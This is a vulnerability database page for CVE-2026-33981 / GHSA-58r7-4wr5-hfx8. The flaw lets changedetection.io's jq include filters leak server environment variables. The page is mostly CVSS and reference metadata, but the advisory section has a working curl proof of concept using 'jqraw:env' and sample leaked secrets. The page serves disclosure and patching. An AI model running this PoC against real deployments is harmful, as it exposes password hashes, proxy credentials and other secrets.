Vulnerability-Lookup

CVE-2026-33981 (GCVE-0-2026-33981)

Vulnerability from cvelistv5 – Published: 2026-03-27 22:01 – Updated: 2026-03-30 18:36

Title

Changedetection.io Discloses Environment Variables via jq env Builtin in Include Filters

Summary

changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue.

Severity ?

8.3 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor

Assigner

GitHub_M

References

URL

Tags

	https://github.com/dgtlmoon/changedetection.io/se…	x_refsource_CONFIRM
	https://github.com/dgtlmoon/changedetection.io/co…	x_refsource_MISC
	https://github.com/dgtlmoon/changedetection.io/re…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	dgtlmoon	changedetection.io	Affected: < 0.54.7

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33981",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-30T18:36:19.303287Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-30T18:36:23.805Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "changedetection.io",
          "vendor": "dgtlmoon",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.54.7"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-27T22:01:13.719Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8"
        },
        {
          "name": "https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f"
        },
        {
          "name": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7"
        }
      ],
      "source": {
        "advisory": "GHSA-58r7-4wr5-hfx8",
        "discovery": "UNKNOWN"
      },
      "title": "Changedetection.io Discloses Environment Variables via jq env Builtin in Include Filters"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33981",
    "datePublished": "2026-03-27T22:01:13.719Z",
    "dateReserved": "2026-03-24T22:20:06.210Z",
    "dateUpdated": "2026-03-30T18:36:23.805Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33981",
      "date": "2026-04-14",
      "epss": "0.00014",
      "percentile": "0.0231"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33981\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-27T22:16:22.793\",\"lastModified\":\"2026-04-02T15:24:05.933\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:webtechnologies:changedetection:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.54.7\",\"matchCriteriaId\":\"70788C7C-32F4-4483-A7F7-83D5DC9D1C6A\"}]}]}],\"references\":[{\"url\":\"https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33981\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-30T18:36:19.303287Z\"}}}], \"references\": [{\"url\": \"https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-30T18:36:08.872Z\"}}], \"cna\": {\"title\": \"Changedetection.io Discloses Environment Variables via jq env Builtin in Include Filters\", \"source\": {\"advisory\": \"GHSA-58r7-4wr5-hfx8\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"dgtlmoon\", \"product\": \"changedetection.io\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.54.7\"}]}], \"references\": [{\"url\": \"https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8\", \"name\": \"https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f\", \"name\": \"https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7\", \"name\": \"https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-27T22:01:13.719Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33981\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-30T18:36:23.805Z\", \"dateReserved\": \"2026-03-24T22:20:06.210Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-27T22:01:13.719Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-58R7-4WR5-HFX8

Vulnerability from github – Published: 2026-03-27 19:11 – Updated: 2026-03-30 20:17

Summary

Changedetection.io Discloses Environment Variables via jq env Builtin in Include Filters

Details

Summary

The jq: and jqraw: include filter expressions allow use of the jq env builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including SALTED_PASS, PLAYWRIGHT_DRIVER_URL, HTTP_PROXY, and any secrets passed as env vars to the container.

Details

Vulnerable file: changedetectionio/html_tools.py, lines 380-388

User-supplied jq filter expressions are compiled and executed without restricting dangerous jq builtins:

if json_filter.startswith("jq:"):
    jq_expression = jq.compile(json_filter.removeprefix("jq:"))
    match = jq_expression.input(json_data).all()
    return _get_stripped_text_from_json_match(match)

if json_filter.startswith("jqraw:"):
    jq_expression = jq.compile(json_filter.removeprefix("jqraw:"))
    match = jq_expression.input(json_data).all()
    return '\n'.join(str(item) for item in match)

The form validator at forms.py:670-673 only checks that the expression compiles (jq.compile(input)) — it does not block dangerous functions. The jq env builtin reads all process environment variables regardless of the input data, returning a dictionary of every env var in the server process.

PoC

Step 1 — Create a watch for any JSON endpoint with jqraw:env as the include filter:

curl -X POST http://target:5000/api/v1/watch \
  -H "Content-Type: application/json" \
  -H "x-api-key: <api-key>" \
  -d '{
    "url": "https://httpbin.org/json",
    "include_filters": ["jqraw:env"],
    "time_between_check": {"seconds": 30}
  }'

If no password or API key is set (the default), no authentication is needed.

Step 2 — Wait for the watch to be checked, or trigger a recheck:

curl "http://target:5000/api/v1/watch/<uuid>?recheck=true" -H "x-api-key: <api-key>"

Step 3 — The processed text file on disk now contains all environment variables:

{'SALTED_PASS': '...hashed password...', 'PLAYWRIGHT_DRIVER_URL': 'ws://browser:3000',
 'HTTP_PROXY': 'socks5h://10.10.1.10:1080', 'SHELL': '/bin/bash',
 'HOME': '/root', 'PATH': '...', 'WERKZEUG_SERVER_FD': '22',
 ... and all other env vars}

The data is visible in the web UI when viewing the watch's latest snapshot, and is also included in notification messages if notifications are configured.

Confirmed on v0.54.6: The processed text file stored 46 environment variables from the server process.

Impact

Secret exposure: Leaks SALTED_PASS (password hash used for authentication), enabling offline cracking or direct session forgery
Infrastructure credential theft: Leaks PLAYWRIGHT_DRIVER_URL, WEBDRIVER_URL, HTTP_PROXY/HTTPS_PROXY, database connection strings, and any API keys or tokens passed as environment variables
Cascading access: Leaked proxy credentials or browser automation URLs can be used to pivot into other internal systems
Affects all deployments using jq: Any instance where the Python jq module is installed (standard in Docker deployments) is vulnerable
No authentication required by default: changedetection.io ships with no password and the API accessible without a key, so this is exploitable by any user with network access in the default configuration

Severity ?

8.3 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.54.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "changedetection.io"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.54.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33981"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-27T19:11:16Z",
    "nvd_published_at": "2026-03-27T22:16:22Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container.\n\n### Details\n\n**Vulnerable file:** `changedetectionio/html_tools.py`, lines 380-388\n\nUser-supplied jq filter expressions are compiled and executed without restricting dangerous jq builtins:\n\n```python\nif json_filter.startswith(\"jq:\"):\n    jq_expression = jq.compile(json_filter.removeprefix(\"jq:\"))\n    match = jq_expression.input(json_data).all()\n    return _get_stripped_text_from_json_match(match)\n\nif json_filter.startswith(\"jqraw:\"):\n    jq_expression = jq.compile(json_filter.removeprefix(\"jqraw:\"))\n    match = jq_expression.input(json_data).all()\n    return \u0027\\n\u0027.join(str(item) for item in match)\n```\n\nThe form validator at `forms.py:670-673` only checks that the expression compiles (`jq.compile(input)`) \u2014 it does not block dangerous functions. The jq `env` builtin reads all process environment variables regardless of the input data, returning a dictionary of every env var in the server process.\n\n### PoC\n\n**Step 1 \u2014 Create a watch for any JSON endpoint with `jqraw:env` as the include filter:**\n\n```bash\ncurl -X POST http://target:5000/api/v1/watch \\\n  -H \"Content-Type: application/json\" \\\n  -H \"x-api-key: \u003capi-key\u003e\" \\\n  -d \u0027{\n    \"url\": \"https://httpbin.org/json\",\n    \"include_filters\": [\"jqraw:env\"],\n    \"time_between_check\": {\"seconds\": 30}\n  }\u0027\n```\n\nIf no password or API key is set (the default), no authentication is needed.\n\n**Step 2 \u2014 Wait for the watch to be checked, or trigger a recheck:**\n\n```bash\ncurl \"http://target:5000/api/v1/watch/\u003cuuid\u003e?recheck=true\" -H \"x-api-key: \u003capi-key\u003e\"\n```\n\n**Step 3 \u2014 The processed text file on disk now contains all environment variables:**\n\n```\n{\u0027SALTED_PASS\u0027: \u0027...hashed password...\u0027, \u0027PLAYWRIGHT_DRIVER_URL\u0027: \u0027ws://browser:3000\u0027,\n \u0027HTTP_PROXY\u0027: \u0027socks5h://10.10.1.10:1080\u0027, \u0027SHELL\u0027: \u0027/bin/bash\u0027,\n \u0027HOME\u0027: \u0027/root\u0027, \u0027PATH\u0027: \u0027...\u0027, \u0027WERKZEUG_SERVER_FD\u0027: \u002722\u0027,\n ... and all other env vars}\n```\n\nThe data is visible in the web UI when viewing the watch\u0027s latest snapshot, and is also included in notification messages if notifications are configured.\n\n**Confirmed on v0.54.6:** The processed text file stored 46 environment variables from the server process.\n\n### Impact\n\n- **Secret exposure:** Leaks `SALTED_PASS` (password hash used for authentication), enabling offline cracking or direct session forgery\n- **Infrastructure credential theft:** Leaks `PLAYWRIGHT_DRIVER_URL`, `WEBDRIVER_URL`, `HTTP_PROXY`/`HTTPS_PROXY`, database connection strings, and any API keys or tokens passed as environment variables\n- **Cascading access:** Leaked proxy credentials or browser automation URLs can be used to pivot into other internal systems\n- **Affects all deployments using jq:** Any instance where the Python `jq` module is installed (standard in Docker deployments) is vulnerable\n- **No authentication required by default:** changedetection.io ships with no password and the API accessible without a key, so this is exploitable by any user with network access in the default configuration",
  "id": "GHSA-58r7-4wr5-hfx8",
  "modified": "2026-03-30T20:17:53Z",
  "published": "2026-03-27T19:11:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33981"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dgtlmoon/changedetection.io"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Changedetection.io Discloses Environment Variables via jq env Builtin in Include Filters"
}

FKIE_CVE-2026-33981

Vulnerability from fkie_nvd - Published: 2026-03-27 22:16 - Updated: 2026-04-02 15:24

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f	Patch
security-advisories@github.com	https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7	Product, Release Notes
security-advisories@github.com	https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	webtechnologies	changedetection	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:webtechnologies:changedetection:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "70788C7C-32F4-4483-A7F7-83D5DC9D1C6A",
              "versionEndExcluding": "0.54.7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue."
    }
  ],
  "id": "CVE-2026-33981",
  "lastModified": "2026-04-02T15:24:05.933",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.3,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-27T22:16:22.793",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33981 (GCVE-0-2026-33981)

GHSA-58R7-4WR5-HFX8

Summary

Details

PoC

Impact

FKIE_CVE-2026-33981

Tags

Sightings

Nomenclature